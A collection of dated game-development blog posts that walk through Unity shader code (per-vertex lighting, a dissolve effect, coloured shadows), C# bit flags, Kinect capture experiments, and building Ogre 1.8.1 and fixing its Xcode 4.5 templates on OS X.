Not much here should be too out of the ordinary (save for the call to LIGHT_ATTENUATION). One thing that I’ve yet to be able to account for are the multiplications by 2 in the diffuse calculations. It’s very clear that this gives us an end result that looks like the built-in diffuse shader, but I’m not entirely sure why the built in diffuse shader would be multiplying these values by 2 either. Nevertheless, to hit our goal, we’re going to do it too. Just remember to leave out the ambient calculations in the ForwardAdd pass, otherwise things will be way too bright.

Great! If you try out the shader now, it should look pretty darn good. Don’t get too comfy though, there’s still one more task to do. If you add more than 3 lights to your scene you will notice the shader starts behaving strangely right now. This is because we haven’t specified what we want to do with Vertex lights. Unity only supports up to 4 Per-Pixel lights, but it will allow 4 more lights to be used on a per vertex basis. Unfortunately our current code doesn’t take into account these lights, so we need to add support for them now.

Step one is to add a float3 to our output struct to hold the summed colour of the lights for the current vertex. Next we need to convert our object space position and normal into world space, and pass them to a for loop that calculates the diffuse lighting for each of the 4 possible vertex lights. Once we get that colour into our frag shader, we just add it to the colour we’re already multiplying the texture by. The end result isn’t exactly identical to the built in shaders, but it’s a reasonable approximation.

Our new ForwardBase vertex_output struct looks like this:

struct vertex_output
{
  float4  pos   : SV_POSITION;
  float2  uv  : TEXCOORD0;
  float3  lightDir  : TEXCOORD1;
  float3  normal  : TEXCOORD2;
  LIGHTING_COORDS(3,4) 
  float3  vertexLighting : TEXCOORD5;
};

That pass’ vertex function is now:

    vertex_output vert(vertex_input v)
    {
      vertex_output o;
      o.pos = mul( UNITY_MATRIX_MVP, v.vertex);
      o.uv = v.texcoord.xy;

      o.lightDir = ObjSpaceLightDir(v.vertex);

      o.normal = v.normal;

      TRANSFER_VERTEX_TO_FRAGMENT(o);              

      o.vertexLighting = float3(0.0, 0.0, 0.0);

      #ifdef VERTEXLIGHT_ON

      float3 worldN = mul((float3x3)_Object2World, SCALED_NORMAL);
      float4 worldPos = mul(_Object2World, v.vertex);

      for (int index = 0; index < 4; index++)
      {    
        float4 lightPosition = float4(unity_4LightPosX0[index], 
        unity_4LightPosY0[index], 
        unity_4LightPosZ0[index], 1.0);

        float3 vertexToLightSource = float3(lightPosition - worldPos);        

        float3 lightDirection = normalize(vertexToLightSource);

        float squaredDistance = dot(vertexToLightSource, vertexToLightSource);

        float attenuation = 1.0 / (1.0  + unity_4LightAtten0[index] * squaredDistance);

        float3 diffuseReflection = attenuation * float3(unity_LightColor[index]) 
          * float3(_Color) * max(0.0, dot(worldN, lightDirection));         

        o.vertexLighting = o.vertexLighting + diffuseReflection * 2;
       }

       #endif

       return o;
      }

and the ForwardBase fragment function is:

fixed4 frag(vertex_output i) : COLOR
{
  i.lightDir = normalize(i.lightDir);
  fixed atten = LIGHT_ATTENUATION(i); 

  fixed4 tex = tex2D(_MainTex, i.uv);
  tex *= _Color + fixed4(i.vertexLighting, 1.0);

  fixed diff = saturate(dot(i.normal, i.lightDir));

  fixed4 c;
  c.rgb = (UNITY_LIGHTMODEL_AMBIENT.rgb * 2 * tex.rgb);         
  c.rgb += (tex.rgb * _LightColor0.rgb * diff) * (atten * 2); 
  c.a = tex.a + _LightColor0.a * atten;
  return c;
}
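The vertex light loop is the densest part of the shader, so here’s a CPU-side C++ sketch of just that accumulation. The Vec3 and VertexLight types and the vertexLighting function are assumptions for illustration (in the shader this data comes from unity_4LightPosX0 and friends), and the zero-distance guard is an addition that the shader code above doesn’t have.

```cpp
#include <algorithm>
#include <array>
#include <cmath>

// Hypothetical minimal vector type for this example.
struct Vec3 { float x, y, z; };

Vec3 operator-(Vec3 a, Vec3 b) { return {a.x - b.x, a.y - b.y, a.z - b.z}; }
Vec3 operator+(Vec3 a, Vec3 b) { return {a.x + b.x, a.y + b.y, a.z + b.z}; }
Vec3 operator*(Vec3 a, float s) { return {a.x * s, a.y * s, a.z * s}; }
Vec3 modulate(Vec3 a, Vec3 b) { return {a.x * b.x, a.y * b.y, a.z * b.z}; }
float dot(Vec3 a, Vec3 b) { return a.x * b.x + a.y * b.y + a.z * b.z; }

// Stand-in for one slot of Unity's four vertex lights.
struct VertexLight { Vec3 position; Vec3 color; float atten; };

Vec3 vertexLighting(Vec3 worldPos, Vec3 worldN, Vec3 materialColor,
                    const std::array<VertexLight, 4>& lights)
{
    Vec3 sum{0.0f, 0.0f, 0.0f};
    for (const VertexLight& light : lights)
    {
        Vec3 vertexToLight = light.position - worldPos;
        float squaredDistance = dot(vertexToLight, vertexToLight);
        if (squaredDistance <= 0.0f) continue;  // guard added for this sketch

        Vec3 lightDirection = vertexToLight * (1.0f / std::sqrt(squaredDistance));
        float attenuation = 1.0f / (1.0f + light.atten * squaredDistance);
        float nDotL = std::max(0.0f, dot(worldN, lightDirection));

        // same doubling as the rest of the shader
        Vec3 diffuse = modulate(light.color, materialColor) * (attenuation * nDotL);
        sum = sum + diffuse * 2.0f;
    }
    return sum;
}
```

A white light 2 units directly above a vertex, with an attenuation factor of 0.25, gives attenuation = 1 / (1 + 0.25 * 4) = 0.5, and after the doubling contributes 1.0 per channel. Unused slots with a black colour contribute nothing.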

The source for the entire shader can be found here.

If you made it this far, congratulations! You now have a diffuse shader that takes into account all the lights unity has to offer! As always, feedback is very welcome (especially if you’ve spotted errors, or things that I’ve gotten wrong). You can find me on Twitter. Hope this tutorial helped!

Making a Dissolve Effect with Surface Shaders

2013-09-28T00:00:00+00:00

NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!

I recently posted a shader pack which creates a cool “dissolve” (for lack of a better descriptor) effect, similar to the skin of Skyrim’s dragons during their death animation. As requested by reddit, this post details exactly what you need to know to write one of these shaders yourself, and hopefully, provides you with a good base with which to modify my shaders to your specific needs. I’m going to attempt to start from square one and not assume any shader experience on your part, but it will probably help if you have a general idea of how to build a basic shader beforehand.

Let’s get started.

Getting Started

The obvious first step here is to open up Unity and create a new shader. Unity is going to assume that you would like to create a surface shader, and pre-populate a lot of boilerplate code. Thanks Unity! Now, delete all of it and give yourself a nice, clean slate to work with.

Now that that’s cleaned up, start your shader with the lines:

Shader "MyDissolveShader"
{
	Properties
	{
		
	}
	SubShader
	{
		
	}
}

This is a bit of Unity specific structure; the “Properties” section will allow us to define which variables we want to expose in the inspector, while the “SubShader” section will hold the actual code used in our shader.

Ok, now let’s figure out exactly what we will need the user to define. Take another look at what the effect looks like:

Pretty snazzy, isn't it?

First off, we’re going to need the user to tell us what texture to put on the mesh for its normal undissolved state. The convention with Unity shaders is to call this texture _MainTex. So let’s add that to our properties.

Shader "MyDissolveShader"
{
	Properties
	{
		_MainTex("Main Texture", 2D) = "white"{}
	}
	SubShader
	{
		
	}
}

The new line in properties shows how to define a regular texture for the inspector. We are going to call this variable _MainTex in our code, so that goes first. The “Main Texture” string in the parentheses defines what we want the inspector to display as this variable’s name. The subsequent “2D” declares that this slot in the inspector will accept a 2D texture. The value after the equals sign, “white”{}, just sets the default value of this field to a generic white texture.

Ok, so now that we’ve figured out how to declare a texture, what other textures will we need? For this shader, we’re not going to use bump maps, so the only other texture we need is something to define the shape of the dissolve effect. Let’s call that _DissolveMap.

Shader "MyDissolveShader"
{
	Properties
	{
		_MainTex("Main Texture", 2D) = "white"{}
		_DissolveMap("Dissolve Shape", 2D) = "white"{}
	}
	SubShader
	{
		
	}
}

Ok, aside from our textures we also need 2 floats to control the progress of the effect and size of the edge lines. However, we want to be able to control the range of these floats, so that our users don’t set them to values that are outside of what makes sense for our shader. One way of doing this is with the Range type. Any variables marked as type Range in the properties panel will display as a slider, that moves between the low and high values we define.

Finally, I’m going to add a Color variable to allow us to define what colour the edges of the effect are.

Shader "MyDissolveShader"
{
	Properties
	{
		_MainTex("Main Texture", 2D) = "white"{}
		_DissolveMap("Dissolve Shape", 2D) = "white"{}
		
		_DissolveVal("Dissolve Value", Range(-0.2, 1.2)) = 1.2
		_LineWidth("Line Width", Range(0.0, 0.2)) = 0.1
		
		_LineColor("Line Color", Color) = (1.0, 1.0, 1.0, 1.0)
	}
	SubShader
	{
		
	}
}

One thing to note is that we want the range of the dissolve effect to be functionally between 0.0 and 1.0, but in order to account for the line width, we need to expand the range in both directions by the maximum size the lines can be, otherwise lines will show up when the mesh should have no dissolve applied, and when it should be completely transparent.

Ok perfect, so now that that’s taken care of, let’s move on to actually writing a shader!

Setting Things Up

So now we move down to the SubShader tag. We’re going to be writing a surface shader. Surface shaders are a unity specific type of shorthand that takes care of all the lighting specific shader code for you. It’s perfect for our purposes. What this also decides for us is that our shader needs to be written in CG (as opposed to glsl or hlsl).

The first things we need to do with our shader are tell Unity to expect CG code, and what variables we want our code to access from outside of the shader itself.

Shader "MyDissolveShader"
{
	Properties
	{
		_MainTex("Main Texture", 2D) = "white"{}
		_DissolveMap("Dissolve Shape", 2D) = "white"{}
		
		_DissolveVal("Dissolve Value", Range(-0.2, 1.2)) = 1.2
		_LineWidth("Line Width", Range(0.0, 0.2)) = 0.1
		
		_LineColor("Line Color", Color) = (1.0, 1.0, 1.0, 1.0)
	}
	SubShader
	{
		CGPROGRAM
		#pragma surface surf Lambert
		
		sampler2D _MainTex;
		sampler2D _DissolveMap;
		
		float4 _LineColor;
		float _DissolveVal;
		float _LineWidth;
		
		ENDCG
	}
}

Most of this is hopefully self explanatory, but the one line that may not be is the #pragma… line. This is a surface shader specific pragma that tells unity that we want our model to be lit according to the Lambert lighting model (diffuse lighting). Behind the scenes, Unity will add the code necessary for this lighting model to our shader when it compiles.

The other lines added are just declarations of the data we’re getting from the inspector, so that our shader knows to use this data. It’s important that the variable names used here are exactly the same as the ones we used in the Properties section. The datatypes here are just the CG equivalents of the types we defined above (there’s no such thing as a Color type in CG, so colours are represented as a 4 element vector).

Now, let’s add the rest of the structural code we need in order for our shader to start taking shape.

Shader "MyDissolveShader"
{
	Properties
	{
		_MainTex("Main Texture", 2D) = "white"{}
		_DissolveMap("Dissolve Shape", 2D) = "white"{}
		
		_DissolveVal("Dissolve Value", Range(-0.2, 1.2)) = 1.2
		_LineWidth("Line Width", Range(0.0, 0.2)) = 0.1
		
		_LineColor("Line Color", Color) = (1.0, 1.0, 1.0, 1.0)
	}
	SubShader
	{
		CGPROGRAM
		#pragma surface surf Lambert
		
		sampler2D _MainTex;
		sampler2D _DissolveMap;
		
		float4 _LineColor;
		float _DissolveVal;
		float _LineWidth;
		
		struct Input 
		{
     			half2 uv_MainTex;
     			half2 uv_DissolveMap;
    		};

		void surf (Input IN, inout SurfaceOutput o) 
		{
			o.Albedo = float3(1.0, 1.0, 1.0);
		}
		ENDCG
	}
}

The Input struct defines what information we need to access about each vertex in the model being shaded. In this case, all we need are uv co-ordinates for each of the textures that we’re using. Defining these variables as “uv_” and then a texture name will automatically pull the correct uv’s for that texture.

The surface shader system will handle dealing with the position and normal variables as it needs to, but we don’t need to worry about that.

The surf function that I defined is just a boilerplate surface function. It takes the input we defined, and modifies a SurfaceOutput struct for Unity. This SurfaceOutput data will control what the fragment actually gets shaded as.

The o.Albedo line shows how to set the colour of a fragment. In this case, all we’re doing is assigning each fragment the color white. We’re going to modify this now. The next example will show how to set a fragment to the colour it should be to display _MainTex properly.

Shader "MyDissolveShader"
{
	Properties
	{
		_MainTex("Main Texture", 2D) = "white"{}
		_DissolveMap("Dissolve Shape", 2D) = "white"{}
		
		_DissolveVal("Dissolve Value", Range(-0.2, 1.2)) = 1.2
		_LineWidth("Line Width", Range(0.0, 0.2)) = 0.1
		
		_LineColor("Line Color", Color) = (1.0, 1.0, 1.0, 1.0)
	}
	SubShader
	{
		CGPROGRAM
		#pragma surface surf Lambert
		
		sampler2D _MainTex;
		sampler2D _DissolveMap;
		
		float4 _LineColor;
		float _DissolveVal;
		float _LineWidth;
		
		struct Input 
		{
     			half2 uv_MainTex;
     			half2 uv_DissolveMap;
    		};

		void surf (Input IN, inout SurfaceOutput o) 
		{
			o.Albedo = tex2D(_MainTex, IN.uv_MainTex).rgb;
			
			half4 dissolve = tex2D(_DissolveMap, IN.uv_DissolveMap);
			
			half4 clear = half4(0.0);
		}
		ENDCG
	}
}

If you’ve worked at all with shaders before this should make sense, we’re looking for what colour is at the position in the texture defined by the uv for this position on the mesh. o.Albedo doesn’t set the alpha of our fragment, so we use .rgb to trim the alpha from this function.

I’ve gone ahead and defined a clear variable (this is a 4 element vector with r g b and a set to 0.0) and grabbed the color of this position in the dissolve map texture as well.

Now we need to get to the good stuff, how to decide whether a given fragment should be shaded with the main texture, the line color, or the clear color.

The Good Stuff

We’re going to decide how to shade each fragment based on the red channel of the dissolve map. If the red value of that texture is above the value of _DissolveVal, we are going to shade that fragment with the line colour. If it is above the value of _DissolveVal + _LineWidth, the fragment will be transparent.

In a regular script, this would usually be done with an if/else statement, but unfortunately shaders don’t do if/else flows that well. You’ll get the correct value, but the shader will end up executing the code for every possible outcome before choosing the correct value. It’s much faster (and more shader-y) to use lerp for this. Lerp will mix two values together based on a third float value (if this value is 0, we end up with 100% of value A, if this is 1, we get 100% of value B). Hopefully this sounds like an if statement to you as well.

We’re going to define an integer that will serve as our conditional. The first choice we need to make is whether or not we are transparent. As stated before, we are only transparent if the red value of dissolve is greater than _DissolveVal + _LineWidth.

void surf (Input IN, inout SurfaceOutput o) 
{
	o.Albedo = tex2D(_MainTex, IN.uv_MainTex).rgb;
	
	half4 dissolve = tex2D(_DissolveMap, IN.uv_DissolveMap);
	
	half4 clear = half4(0.0);
	
	int isClear = int(dissolve.r - (_DissolveVal + _LineWidth) + 0.99);
	int isAtLeastLine = int(dissolve.r - (_DissolveVal) + 0.99);
}

The two ints do what their names imply. isClear resolves to 0 if dissolve.r isn’t greater than _DissolveVal + _LineWidth, and isAtLeastLine will be 0 if we should use the regular texture instead of using the line color or transparency.

Once we have those two values, the rest is pretty straight forward.

void surf (Input IN, inout SurfaceOutput o) 
{
	o.Albedo = tex2D(_MainTex, IN.uv_MainTex).rgb;
	
	half4 dissolve = tex2D(_DissolveMap, IN.uv_DissolveMap);
	
	half4 clear = half4(0.0);
	
	int isClear = int(dissolve.r - (_DissolveVal + _LineWidth) + 0.99);
	int isAtLeastLine = int(dissolve.r - (_DissolveVal) + 0.99);
	
	half4 altCol = lerp(_LineColor, clear, isClear);
	
	o.Albedo = lerp(o.Albedo, altCol, isAtLeastLine);
}

In case it isn’t clear, the 2 lines we just added choose whether or not the alt color is clear or the line color, and then choose whether or not we should use the main texture, or the alt color.

We’re almost done! If you switch over to Unity now you might notice that nothing is really going transparent, it’s just going black. This is because we haven’t yet told Unity that this will be a transparent shader. Because of the order things are rendered, you need to explicitly tell Unity when a shader will draw transparent fragments. Luckily this is a pretty simple addition to the top of the shader.

Shader "MyDissolveShader"
{
	Properties
	{
		_MainTex("Main Texture", 2D) = "white"{}
		_DissolveMap("Dissolve Shape", 2D) = "white"{}
		
		_DissolveVal("Dissolve Value", Range(-0.2, 1.2)) = 1.2
		_LineWidth("Line Width", Range(0.0, 0.2)) = 0.1
		
		_LineColor("Line Color", Color) = (1.0, 1.0, 1.0, 1.0)
	}
	SubShader
	{
		Tags{ "Queue" = "Transparent"}
		Blend SrcAlpha OneMinusSrcAlpha
		
		CGPROGRAM
		#pragma surface surf Lambert
		
		sampler2D _MainTex;
		sampler2D _DissolveMap;
		
		float4 _LineColor;
		float _DissolveVal;
		float _LineWidth;
		
		struct Input 
		{
			half2 uv_MainTex;
			half2 uv_DissolveMap;
		};

		void surf (Input IN, inout SurfaceOutput o) 
		{
			o.Albedo = tex2D(_MainTex, IN.uv_MainTex).rgb;

			half4 dissolve = tex2D(_DissolveMap, IN.uv_DissolveMap);

			half4 clear = half4(0.0);

			int isClear = int(dissolve.r - (_DissolveVal + _LineWidth) + 0.99);
			int isAtLeastLine = int(dissolve.r - (_DissolveVal) + 0.99);

			half4 altCol = lerp(_LineColor, clear, isClear);

			o.Albedo = lerp(o.Albedo, altCol, isAtLeastLine);
			
			o.Alpha = lerp(1.0, 0.0, isClear);
			
		}
		ENDCG
	}
}

It takes 3 lines to make the shader transparent. The Tags… line tells Unity to render objects using this shader when it renders transparent geometry, and the Blend line defines how our transparency behaves. The one above tells our shader to use alpha blending (as opposed to additive or multiplicative transparency). Finally, the o.Alpha… line defines the transparency of the fragment being shaded.
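For reference, the arithmetic behind Blend SrcAlpha OneMinusSrcAlpha can be sketched on the CPU as follows. This is only an illustration of the blend equation (source color times source alpha, plus destination color times one minus source alpha); the `Rgb` struct and `alphaBlend` function are made-up names, not anything Unity exposes.

```cpp
#include <cassert>

// Illustrative color type (not a Unity type).
struct Rgb { float r, g, b; };

// Blend SrcAlpha OneMinusSrcAlpha:
//   result = src * srcAlpha + dst * (1 - srcAlpha)
// src is the fragment the shader just produced, dst is what is already
// in the frame buffer at that pixel.
static Rgb alphaBlend(Rgb src, float srcAlpha, Rgb dst) {
    assert(srcAlpha >= 0.0f && srcAlpha <= 1.0f);
    const float inv = 1.0f - srcAlpha;
    return { src.r * srcAlpha + dst.r * inv,
             src.g * srcAlpha + dst.g * inv,
             src.b * srcAlpha + dst.b * inv };
}
```

Because the dissolve shader only ever writes an alpha of 1 or 0, each fragment either fully replaces the background or leaves it untouched.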

Put all together, you have the Dissolve Diffuse shader from my Dissolve Shader pack! Hopefully this tutorial was helpful. Shoot any feedback you have to me on Twitter. Happy shading!

Multi Coloured Shadows In Unity

2013-08-13T00:00:00+00:00

NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!

UPDATE: I’ve posted a tutorial on how to get coloured shadows working in your project. Check it out here

Lately, in my (precious little) free time, I’ve been working on a custom shadow receiver system which will give me greater control over the appearance of soft shadows in Unity. On the surface, it sounds like a fun project. It gets slightly more insane when you take into account that I had never so much as written my own shadow map system before starting this. Crawling is boring, I tend to jump (metaphorical) cliffs and hope that I figure out flying, running, landing, and crawling by the time I hit ground.

At first, I thought I’d actually start from the ground up and simply disable the Unity shadows altogether and substitute my own depth maps. It works pretty well for one light, but I’ve run into issues trying to pass multiple shadow maps to multiple passes in Unity. I’m not yet sure whether that’s a limitation of my own knowledge, or just something that Unity doesn’t let you do. Once I hit that wall though, it occurred to me that it might just be easier to tap into the shadow maps already being generated. It would certainly save a lot of extra scripts, and would benefit from all the work that’s already gone into Unity.

(Manually making shadow maps, the depth map from the light is displayed in the corner)

And so, I (once again) entered the wonderful world of undocumented Unity functionality. This time, I ended up delving through the CGInclude files that come with the built in shaders. The result of this was an interesting set of variables defined in the UnityShaderVariables.cginc and AutoLight.cginc files, namely: unity_World2Shadow[4], _ShadowMapTexture, _LightShadowData and the macro UNITY_SAMPLE_SHADOW_PROJ.

Most of the above is self explanatory, but the macro was something I hadn’t thought about. A lot of functionality is wrapped in macros in the built in shaders, which handle the difference between DirectX and GLSL shading.

Once I knew what the internal variables were called, it was pretty easy to get rudimentary hard shadows up and running using the built in shadow map… for one light. I’m still working on getting multiple lights working at once, but, in the interest of enjoying small victories, I figured I’d do something a bit fun with the new shadows I had made. Since I now have complete control over the shader producing the shadows, why not change their colour? Therefore, may I present, the most fabulous looking hard shadows ever produced in Unity… probably!

(The purple's darkness gets set by the depth value for that fragment)

A lot of work goes into making games look realistic, but I think that there’s a lot to be said for making games look uniquely different from the norm. Purple shadows are how I’m doing that today :D

As always, send me a message on Twitter if you want to chat (especially about games or graphics).

Bit Flags are Pretty Cool

2013-04-21T00:00:00+00:00

NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plans on updating it. Beware!

I’ve been working on a prototype for (possibly) my next personal project, and one of the things I’ve needed to do a number of times is store a lot of boolean attributes on different objects. This led to some really terrible looking scripts with a whole host of boolean flags at the top of them, and I decided I needed to find a better way of handling things.

I’ve had some fun before with packing a whole bunch of booleans into byte-sized structs using the bit field operator in C++, but I’ve never seen anything like that done in C#, and if I can help it, I try to avoid dealing directly with memory addresses in Unity scripts. Luckily, bit flags seem to do the exact same job (possibly better). To show you what I mean, let me link an example:

So here’s what’s going on: rather than specifying an int or float value for the members of the enum, you can assign each of them a hex number. Provided each of these hex numbers matches up to the value represented by a single bit in a byte (a power of 2), you can use all of the regular bitwise operations with these new enum values.
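As a rough illustration of the idea, here is the same pattern sketched in C++ rather than C#. The item names and helper functions are hypothetical, chosen only to show one power-of-two value per flag and the usual bitwise operations on them.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical inventory flags: each value sets exactly one bit.
enum ItemFlags : std::uint8_t {
    None   = 0x00,
    Sword  = 0x01,
    Shield = 0x02,
    Potion = 0x04,
    Key    = 0x08
};

// OR sets the item's bit without touching the others.
static std::uint8_t addItem(std::uint8_t inventory, ItemFlags item) {
    return static_cast<std::uint8_t>(inventory | item);
}

// AND with the inverted mask clears only the item's bit.
static std::uint8_t removeItem(std::uint8_t inventory, ItemFlags item) {
    return static_cast<std::uint8_t>(inventory & ~item);
}

// AND with the mask is non-zero only if the item's bit is set.
static bool hasItem(std::uint8_t inventory, ItemFlags item) {
    return (inventory & item) != 0;
}
```

A whole set of booleans then fits in a single byte: adding Sword and Key to an empty inventory gives 0x09, and hasItem can test for either one independently.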

Provided the player can only have 1 of each item, you could do an entire inventory this way (not that I think that would be the greatest idea). Nevertheless, it’s certainly handy for fast prototyping, and I’m sure that less contrived examples will find their way into production code at some point.

Fun With The Kinect

2013-03-11T00:00:00+00:00

NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!

I’ve been playing around with the Kinect this month (I love that thing). I’ve used it in the past with some gesture control and image processing at work, but I hadn’t really considered it as an option for gamedev, mostly because I don’t have an Xbox SDK. I’ve been trying to think of cool ways to use it though, lest it become the coolest dust collector I have in my apartment, and I think I’m on to something this month.

As you’ve probably gathered from my other work, I suck at visual art, and it’s probably my least favourite thing to work on when making a game, so any time I can find a cool way to simplify that process I jump on it (why do you think I got into augmented reality?). This month I’ve been experimenting with capturing the output from a kinect and using that in place of 3D models. It may not be useful for all situations, but the results are pretty cool, don’t you think?

Unbreaking the Xcode templates in Xcode 4.5

2012-12-02T00:00:00+00:00

NOTE: This article is OLD! (From 2012!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!

The Xcode templates that come with Ogre 1.81 are rather frustrating to get working, especially if you don’t know what the cryptic error messages that it spits out at you mean. So I’m here today to walk you step by step through getting a basic Ogre project up and running.

All of this is taken from my experiences trying to get Ogre to work on my machine. Given that the templates bundled with Ogre were written by people much more knowledgeable than me, it wouldn’t surprise me if some of these issues aren’t universal problems. Hopefully my experiences are helpful, even if you only hit one of the numerous issues I described here.

###What you will need:###

A built version of Ogre 1.81 (see my previous post for how to build this)
The Ogre Xcode templates installed (found in Ogre’s SDK/OSX folder)

Note: This tutorial was written based on my experience working with Xcode 4.5, and OS X Lion. YMMV if you’re following along with a different configuration.

###Starting the Project###

Let’s start at ground zero. Open Xcode and do the following:

Start a new project, and select the “Mac OS X Application” template in the Ogre category. After naming your project, fill in the path to your Ogre SDK with the appropriate value. Welcome to linker hell.

For some reason, Xcode has the annoying tendency to omit the leading / in the include paths in the OGRE template (regardless of whether you remembered to include one in the path to your SDK). So the first thing that has to be done to make this project buildable is to navigate to your build settings, and modify all the file paths located in the Framework Search Paths, Header Search Paths, and Library Search Paths so that they begin with a /.

Next, move to the “Build Phases” tab and expand the “Link Binary With Libraries” section. You should see Ogre.framework, OpenGL.framework, and QuartzCore.framework appearing in red. I think this is a problem with the template itself, but in any case, it’s easily fixed. For the latter two, simply hit the + button and find them in the list of Apple frameworks, and then delete the red list entries.

Ogre.framework can be found in the lib/debug folder in your build directory, so add that to your project as well.

Now hit build. If everything is identical to my set up, you should get a build error saying that OgreCamera.h can’t be found. There’s a good reason for this: the include paths are missing a few directories. Rather than describe how to fix this, I’ve attached a screenshot of what my include paths end up looking like when I’m through fixing them. “1.81” is the folder which stores my built Ogre3D library, and “ogre_src_v1-8-1” is the root folder of the Ogre SDK.

This may not be the most optimal way to set up your include paths (I’m really, really hoping it isn’t, it’s pretty messy), but I’ve run into strange issues marking things recursive, and so far, this set up has worked for me. Let me know if there’s a better way of doing things in the comments, and I’ll update this tutorial.

Next move to the Library Search paths, and ensure that both paths are pointing to the correct location of the files they need. One should be pointing to the location of your ogre lib, and the other to the lib folder of your dependencies. If you hit build and see an error like this:

it means that this step has not been done correctly.

###Restrict your architectures!###

Next ensure that your project is set to build only for the 64 bit architecture. As I mentioned in the last post, currently my set up is only configured to build for 64 bit machines, because I was running into a boat load of configuration errors trying to build for i386 as well. Since I’m nowhere near releasing something with OGRE just yet, I’ve decided to put off figuring out i386 config issues until I absolutely have to.

###Catching a wild Ditto!###

If you hit build now, you should end up with 1 error, the cryptically named “shell script invocation error,” which looks something like this:

It’s a shame that this isn’t more descriptive, because it took me a long time to understand exactly what was going on, but fixing it is dead simple once you know what the error means.

Ogre’s build process involves copying files from your Media paths to the content folder of the built application. This is done at the end of your build process by a shell script, and the command that script uses to copy these files is called ditto. All this error is saying is that a path supplied to the ditto command is wrong.

To fix this, go back to your project settings, and get to your “Build Phases” tab. Expand the “Run Script” item (it should be at the bottom of your build phases list), and you should immediately see the ditto commands.

The offender is the last line,

ditto $PROJECT_DIR/$PROJECT_NAME/*.cfg "$BUILT_PRODUCTS_DIR/Tutorial.app/Contents/Resources/"

(Note: Tutorial.app will be replaced by whatever you called the project on your machine)

There’s a problem with the location of quotation marks here: the source path isn’t quoted, which is causing it to be misinterpreted. Simply quote the directory part of the path, leaving *.cfg outside the quotes so the wildcard still expands:

ditto "$PROJECT_DIR/$PROJECT_NAME/"*.cfg "$BUILT_PRODUCTS_DIR/Tutorial.app/Contents/Resources/"

Hit build now, and you should (finally) have a successful compile.

###Not there yet.###

Unfortunately, we’re not done, because now we get to sort through runtime errors. In your output, or your Ogre log file, you should see a message along the lines of

OGRE EXCEPTION(7:InternalErrorException): Could not load dynamic library ./RenderSystem_GL.

This is because we haven’t configured OGRE to know where our Plugins are yet. The quickest way to fix this is to open up the file plugins.cfg, and replace

PluginFolder=./

with

PluginFolder= (path to build/lib/release)

Now, hit build/run one more time, and you should be greeted with this screen:

Hit ok again to finally view the sum of all of our hard work:

Finally, it’s all working! If you run into any problems not addressed here, grab me on Twitter and we can work through it. I’d love to dig into this build process more through troubleshooting problems I haven’t hit yet. Additionally, if anyone has a better way of getting all of this done / setting up an Ogre project in Xcode, I’d love to hear about it, because I’m really hoping there’s a less messy way of getting it all set up / configuring it for i386. Regardless, thanks for reading!

Building Ogre 1.81 on Lion

2012-11-19T00:00:00+00:00

NOTE: This article is OLD! (From 2012!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!

I’ve recently decided that I need to go open source for my hobby projects, namely because I’ve reached a point where Unity Free is becoming too restrictive for my tastes, yet I’m still too poor to buy Unity Pro (one day I’ll make a game that pays for more than a night at a bar, but that day hasn’t happened yet).

After spending a long week trying to make JMonkey suit my needs (namely: an asset pipeline that doesn’t make me want to shoot myself), I abandoned it and meekly returned to the engine of my third year at Humber: Ogre3D. I had only worked with the precompiled windows binaries until now, but how hard could building it from source (because if I’m going open source, I may as well embrace the whole deal) on my mac be?

Three days of pulling my hair out later, I finally have not only Ogre 1.81 built on my mac, but I also have the Xcode 4 template project compiling, and because there’s absolutely no reason that ANYONE should have to spend three days trying to weed through outdated tutorials, I’m posting the whole process here in exhaustive detail, with the hopes that it helps at least one other poor soul trying to do this.

This post will ONLY cover building the engine itself. The next article will cover how to get the Xcode 4 templates to work (they’re broken in some weird spots in Xcode 4.5).

###Ingredients###

OGRE 1.8.1 Source for Linux/OSX
Mac OS X Ogre Dependencies – (this tutorial assumes you’re grabbing the precompiled ones, just to limit the number of things that can go wrong)
CG Framework
CMake 2.8.10.1
This tutorial assumes you’re using Xcode 4.5, although I don’t know if that makes a difference for what we’re doing.

###Setting up the source directory###

Extract the Ogre src zip file into wherever you want your Ogre SDK to be installed to. I just put it in my Macintosh HD directory so that it was easy to find, but I think the more correct place to put it is in ~/Library/Developer/SDKs
Extract the precompiled dependencies into the top level folder in the Ogre SDK directory (in my case /ogre_src_v1-8-1/)
Create a directory in your root folder called “boost”
Drag the folder called boost out of Dependencies/include into the boost folder you just made
Create a folder called lib in the boost folder (i.e. /ogre_src_v1-8-1/boost/lib)
Drag the boost libraries at Dependencies/lib into this folder.

###Cooking With CMake###

Start CMake’s GUI tool
Hit the Browse Source button on the top right, and select the Ogre SDK folder that you’ve been working with
Copy and paste this directory into the “Where to build the binaries” field as well. Add the name of your build folder to the end of this path. For me, this was /ogre_src_v1-8-1/1.81, but the name of the folder isn’t important, it’s just important that this build folder IS NOT your root SDK folder. That way, if something goes wrong, you can start the build process over again without having to do all the previous steps.
Hit “Configure” and make sure that “Xcode” and “Use default native compilers” are selected. Then click Done
You should see a bunch of options highlighted in red. That’s fine. Ensure that OGRE_BUILD_CG is selected, and then press Configure again. NOTE: the CMake console will show a number of warnings in red. IGNORE THESE.
Once that’s done, click “Generate” and exit CMake

###Building Ogre###

Navigate to your build directory now, and open the Xcode project you just generated.
Delete i386 from your project’s valid architectures (otherwise boost complains. Long term, I think only building for 64 bit is going to cause some problems, but in the interest of getting things running quickly, I ignored these worries for now)
Set your project to build for “My Mac 64-bit,” and your Architectures to “64-bit-intel”
Hit build, watch the magic happen.
If you want to, once the build is complete, change your build to release mode and build again to get Ogre built in release.

###Verifying the Build###

You should now have 2 folders in your build directory’s bin folder (Release and Debug). Inside each folder should be a copy of SampleBrowser.app. To ensure everything is working, run one of these programs and go through each sample.
Hopefully all the samples should be in working order. Congratulations, you now have a built copy of Ogre sitting on your computer!

If you run into any problems, message me on twitter and I’ll do my best to figure out what’s going on with your build. I’m definitely not an expert, or even demonstrably good at using Ogre, but I’d like to think that all the troubleshooting I’ve done this week makes me a decent resource when it comes to just building the engine on mac. Good luck!